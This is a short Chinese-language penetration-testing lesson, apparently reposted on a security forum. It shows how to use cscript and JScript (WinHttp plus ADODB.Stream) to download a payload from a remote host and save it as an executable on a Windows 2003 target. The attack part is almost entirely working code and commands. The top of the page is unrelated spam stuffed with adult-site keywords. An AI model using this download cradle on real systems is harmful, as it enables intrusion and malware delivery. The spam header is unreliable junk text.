亚洲乱码一卡二卡四卡乱码新区_亚洲乱码中文字幕小综合_亚洲人成电影在线播放_亚洲性色AV一区二区三区_亚洲一区二区三区影院_亚洲中文字幕久久精品无码A_亚洲中文字幕无码专区_伊人热热久久原色播放WWW_在线观看AV永久免费_最新欧洲大片免费在线,欧美日韩成人三级免费看,久久黄色网址,欧美激情内射喷水高潮

返回
第四十三課:js一句話下載payload
專注APT攻擊與防御
https://micropoor.blogspot.com/

windows 全版本都會(huì)默認(rèn)支持js,并且通過cscript來調(diào)用達(dá)到下載payload的目的。

靶機(jī):windows 2003
讀取:

C:test>cscript /nologo downfile.js http://192.168.1.115/robots.txt
附代碼:

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);

寫入:
C:test>cscript /nologo dowfile2.js http://192.168.1.115/robots.txt
附代碼:

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");

后者的話:簡(jiǎn)單,易用,輕便,。

Micropoor
?
?2000 - 2025 看雪 / 滬ICP備2022023406號(hào) / 滬公網(wǎng)安備 31011502006611號(hào)

郵件